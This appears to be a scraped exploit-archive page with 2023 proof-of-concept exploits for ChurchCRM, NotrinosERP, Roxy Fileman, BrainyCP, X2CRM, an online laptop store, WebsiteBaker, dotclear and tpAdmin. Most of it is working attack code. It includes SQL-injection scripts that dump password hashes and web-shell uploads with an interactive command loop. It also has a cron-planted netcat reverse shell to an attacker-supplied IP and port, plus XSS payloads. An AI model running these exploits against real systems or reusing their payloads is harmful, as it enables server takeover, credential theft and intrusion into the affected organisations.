ChurchCRM version 4.5.1 suffers from a remote authenticated SQL injection vulnerability.

    # Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md# Software Link: https://github.com/ChurchCRM/CRM/releases# Vendor Homepage: http://churchcrm.io/# Version: 4.5.1# Tested on: Windows, Linux# CVE: CVE-2023-24787"""The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter.This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School. The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping.This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.This script is created as Proof of Concept to retrieve the username and password hash from user_usr table."""import sys, requestsdef dumpUserTable(target, session_cookies):        print("(+) Retrieving username and password")    print("")    url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)    headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}                  r = requests.get(url, headers=headers)    lines = r.text.splitlines()        for line in lines:         if "<td >Perseverance" in line:            print(line.split("Perseverance")[1].split("</td>")[0])    def login(target, username, password):    target = "%s/session/begin" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "User=%s&Password=%s" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)               print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")    dumpUserTable(target, session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

ChurchCRM 4.5.1 SQL Injection

NotrinosERP version 0.7 suffers from a remote authentication blind SQL injection vulnerability.

    # Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md# Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7# Vendor Homepage: https://notrinos.com/# Version: 0.7# Tested on: Windows, Linux# CVE: CVE-2023-24788"""The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order.The OrderNumber parameter require a valid orderNumber value.This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application."""import sys, requestsdef injection(target, inj_str, session_cookies):        for j in range(32, 126):        url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j)))        headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}                      r = requests.get(url, headers=headers)        res = r.text        if "NotrinosERP 0.7 - Login" in res:            session_cookies = login(target, username, password)            headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}            r = requests.get(url, headers=headers)        elif (r.elapsed.total_seconds () > 2 ):            return j    return Nonedef login(target, username, password):    target = "%s/index.php" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781')    def retrieveDBName(session_cookies):       db_name = ""    print("(+) Retrieving database name")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_name += chr(retrieved_value)                    else:            break    print("Database Name: "+db_name) def retrieveDBVersion(session_cookies):    db_version = ""    print("(+) Retrieving database version")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_version += chr(retrieved_value)            sys.stdout.flush()        else:            break    print("Database Version: "+db_version)def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)           print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")    retrieveDBName(session_cookies)    print("")    retrieveDBVersion(session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

NotrinosERP 0.7 SQL Injection

Roxy Fileman versions 1.4.5 and below for .NET suffer from a remote shell upload vulnerability.

    # Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload# Date: 09/04/2023# Exploit Author: Zer0FauLT [admindeepsec@proton.me]# Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net# Version: <= 1.4.5# Tested on: Windows 10 and Windows Server 2019# CVE : 0DAY###########################################################################################                First, we upload the .jpg shell file to the server.                     ###########################################################################################POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 666Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="action"upload------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="method"ajax------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="d"/Upload/PenTest------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="files[]"; filename="test.jpg"Content-Type: image/jpegâ€°PNG<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>------WebKitFormBoundarygOxjsc2hpmwmISeJ--###########################################################################################   In the second stage, we manipulate the .jpg file that we uploaded to the server.     ###########################################################################################{"FILES_ROOT":          "","RETURN_URL_PREFIX":   "","SESSION_PATH_KEY":    "","THUMBS_VIEW_WIDTH":   "140","THUMBS_VIEW_HEIGHT":  "120","PREVIEW_THUMB_WIDTH": "300","PREVIEW_THUMB_HEIGHT":"200","MAX_IMAGE_WIDTH":     "1000","MAX_IMAGE_HEIGHT":    "1000","INTEGRATION":         "ckeditor","DIRLIST":             "asp_net/main.ashx?a=DIRLIST","CREATEDIR":           "asp_net/main.ashx?a=CREATEDIR","DELETEDIR":           "asp_net/main.ashx?a=DELETEDIR","MOVEDIR":             "asp_net/main.ashx?a=MOVEDIR","COPYDIR":             "asp_net/main.ashx?a=COPYDIR","RENAMEDIR":           "asp_net/main.ashx?a=RENAMEDIR","FILESLIST":           "asp_net/main.ashx?a=FILESLIST","UPLOAD":              "asp_net/main.ashx?a=UPLOAD","DOWNLOAD":            "asp_net/main.ashx?a=DOWNLOAD","DOWNLOADDIR":         "asp_net/main.ashx?a=DOWNLOADDIR","DELETEFILE":          "asp_net/main.ashx?a=DELETEFILE","MOVEFILE":            "asp_net/main.ashx?a=MOVEFILE","COPYFILE":            "asp_net/main.ashx?a=COPYFILE","RENAMEFILE":          "asp_net/main.ashx?a=RENAMEFILE","GENERATETHUMB":       "asp_net/main.ashx?a=GENERATETHUMB","DEFAULTVIEW":         "list","FORBIDDEN_UPLOADS":   "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess","ALLOWED_UPLOADS":     "bmp gif png jpg jpeg","FILEPERMISSIONS":     "0644","DIRPERMISSIONS":      "0755","LANG":                "auto","DATEFORMAT":          "dd/MM/yyyy HH:mm","OPEN_LAST_DIR":       "yes"}#############################################################################################################################################################################################################################   We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows.     #############################################################################################################################################################################################################################POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 44Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx===========================================================================================================================================================================================================================POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 68Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx###########################################################################################                                 and it's done!                                         ###########################################################################################HTTP/2 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Vary: Accept-EncodingServer: Microsoft-IIS/10.0X-Aspnet-Version: 4.0.30319X-Powered-By-Plesk: PleskWinDate: Sun, 09 Apr 2023 09:49:34 GMTContent-Length: 21{"res":"ok","msg":""}=============================================================================================

Roxy Fileman 1.4.5 Shell Upload

** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in yuan1994 tpAdmin 1.3.12. Affected is the function remote of the file application\admin\controller\Upload.php. The manipulation of the argument url leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225408. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVE-2023-1971

BrainyCP version 1.0 suffers from a remote code execution vulnerability.

    # Exploit Title: BrainyCP V1.0 - Remote Code Execution# Date: 2023-04-03# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://brainycp.io# Demo: https://demo.brainycp.io# Tested on: Kali Linux# CVE : N/Aimport requests# credentialsurl = input("URL: ")username = input("Username: ")password = input("Password: ")ip = input("IP: ")port = input("Port: ")# login session = requests.Session()login_url = f"{url}/auth.php"login_data = {"login": username, "password": password, "lan": "/"}response = session.post(login_url, data=login_data)if "Sign In" in response.text:    print("[-] Wrong credentials or may the system patched.")    exit()# reverse shell reverse_shell = f"nc {ip} {port} -e /bin/bash"# requestadd_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"add_cron_data = {    "cron_freq_minutes": "*",    "cron_freq_minutes_own": "",    "cron_freq_hours": "*",    "cron_freq_hours_own": "",    "cron_freq_days": "*",    "cron_freq_days_own": "",    "cron_freq_months": "*",    "cron_freq_weekdays": "*",    "cron_command": reverse_shell,    "cron_user": username,}response = session.post(add_cron_url, data=add_cron_data)print("[+] Check your listener!")

BrainyCP 1.0 Remote Code Execution

X2CRM versions 6.6 and 6.9 suffer from multiple cross site scripting vulnerabilities.

    # Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: Actions[subject]# CVE: CVE-2022-48178# Date: 27.12.2022'''POC REQUEST:========POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 172Origin: http://localhostConnection: closeReferer: http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; 5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsrSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originYII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=testEXPLOITATION========1. Create an action2. Inject payload to the vulnerable parameter in POST requestPayload: %3Cscript%3Ealert(1)%3C%2Fscript%3E'''# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)# Exploit Author: Betul Denizler# Vendor Homepage: https://x2crm.com/# Software Link: https://sourceforge.net/projects/x2engine/# Version: X2CRM v6.6/6.9# Tested on: Ubuntu Mate 20.04# Vulnerable Parameter: model# CVE: Use CVE-2022-48177# Date: 27.12.2022'''POC REQUEST:========GET /x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeCookie: LoginForm[username]=admin; LoginForm[rememberMe]=1; PHPSESSID=959fpkms4abdhtresce9k9rmk3; YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab; d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; locationTrackingFrequency=60; locationTrackingSwitch=1; 5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1EXPLOITATION========1. Select Import Records Model in admin settings2. Inject payload to the vulnerable parameter in GET requestPayload: "><body onload="alert(4)">'''

X2CRM 6.6 / 6.9 Cross Site Scripting

Online Computer And Laptop Store version 1.0 suffers from a remote shell upload vulnerability.

#!/usr/bin/env python3

# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)  
# Date: 09/04/2023  
# Exploit Author: Matisse Beckandt (Backendt)  
# Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip  
# Version: 1.0  
# Tested on: Debian 11.6  
# CVE : CVE-2023-1826

# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.  
import requests  
from argparse import ArgumentParser  
from uuid import uuid4  
from datetime import datetime, timezone

def interactiveShell(fileUrl: str):  
    print("Entering pseudo-shell. Type 'exit' to quit")  
    while True:  
        command = input("\n$ ")  
        if command == "exit":  
            break

        response = requests.get(f"{fileUrl}?cmd={command}")  
        print(response.text)

def uploadFile(url: str, filename: str, content):  
    endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"  
    file = {"img": (filename, content)}

    response = requests.post(endpoint, files=file)  
    return response

def getUploadedFileUrl(url: str, filename: str):  
    timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes  
    epoch = int(timeNow.timestamp()) # Time in milliseconds  
    possibleFilename = f"{epoch}_{filename}"  
    fileUrl = f"{url}/uploads/{possibleFilename}"  
    response = requests.get(fileUrl)  
    if response.status_code == 200:  
        return fileUrl

def exploit(url: str):  
    filename = str(uuid4()) + ".php"  
    content = "<?php system($_GET['cmd'])?>"  
    response = uploadFile(url, filename, content)

    if response.status_code != 200:  
        print(f"[File Upload] Got status code {response.status_code}. Expected 200.")

    uploadedUrl = getUploadedFileUrl(url, filename)  
    if uploadedUrl == None:  
        print("Error. Could not find the uploaded file.")  
        exit(1)  
    print(f"Uploaded file is at {uploadedUrl}")

    try:  
        interactiveShell(uploadedUrl)  
    except KeyboardInterrupt:  
        pass  
    print("\nQuitting.")

def getWebsiteURL(url: str):  
    if not url.startswith("http"):  
        url = "http://" + url  
    if url.endswith("/"):  
        url = url[:-1]  
    return url

def main():  
    parser = ArgumentParser(description="Exploit for CVE-2023-1826")  
    parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")  
    args = parser.parse_args()

    url = getWebsiteURL(args.url)  
    exploit(url)

if __name__ == "__main__":  
    main()

Online Computer And Laptop Store 1.0 Shell Upload

WebsiteBaker version 2.13.3 suffers from a cross site scripting vulnerability.

    Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)Application: WebsiteBakerVersion: 2.13.3Bugs:  Stored XSSTechnology: PHPVendor URL: https://websitebaker.org/pages/en/home.phpSoftware Link: https://wiki.websitebaker.org/doku.php/en/downloadsDate of found: 02.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1.Anyone who has the authority to create the page can do thispayload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3EPOST /admin/pages/add.php HTTP/1.1Host: localhostContent-Length: 137Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9Connection: closeb7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add2. Visit http://localhost/

WebsiteBaker 2.13.3 Cross Site Scripting

dotclear version 2.25.3 suffers from a remote shell upload vulnerability.

    Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)Application: dotclearVersion: 2.25.3Bugs:  Remote Code Execution (RCE) (Authenticated) via file uploadTechnology: PHPVendor URL: https://dotclear.org/Software Link: https://dotclear.org/downloadDate of found: 08.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================While writing a blog post, we know that we can upload images. But php did not allow file upload. This time<?php echo system("id"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it.We were able to run the php code when we visited your pagepoc request:POST /dotclear/admin/post.php HTTP/1.1Host: localhostContent-Length: 566Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1ccConnection: closepost_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=poc video : https://youtu.be/oIPyLqLJS70

dotclear 2.25.3 Shell Upload

** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as problematic, has been found in yuan1994 tpAdmin 1.3.12. This issue affects the function Upload of the file application\admin\controller\Upload.php. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225407. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

**RCE Vulnerability in tpAdmin**

**Project:** https://github.com/yuan1994/tpAdmin

tpadmin is a management background based on the official version of ThinkPHP5.0 and Hui.admin v2.5.

So far, the project has 437 stars and 186 forks on github.

**An arbitrary file upload vulnerability exists in tpadmin, allowing an attacker to take over server privileges.**

Note:  
If you want to deploy the system:  
After downloading the project, use composer to download the required dependencies (it is recommended to modify composer.json first)  
Just modify the following part:

        "require": {
            "php": ">=5.4.0",
            "topthink/framework": "5.0.7",
            "topthink/think-captcha": "1.0.7",
            "qiniu/php-sdk": "7.1.3",
            "phpoffice/phpexcel": "1.8.2",
            "yuan1994/tp-mailer": "0.2.4"
    

Then execute composer update or composer install  
If you still cannot access the page, refer to thinkphp’s official deployment manual:  
https://www.kancloud.cn/manual/thinkphp5/129745  
https://www.kancloud.cn/manual/thinkphp5/177576

Visit and log in to the background, for example: http://192.168.159.134/admin/pub/login.html

Username:admin

Password:123456

**Vulnerable file: application\\admin\\controller\\Upload.php**

**The file upload function in this controller does not set the file format filter, so that the webshell can be uploaded.**

Click to upload webshell, and get the url path in the http return package

GETSHELL.

Tag

#php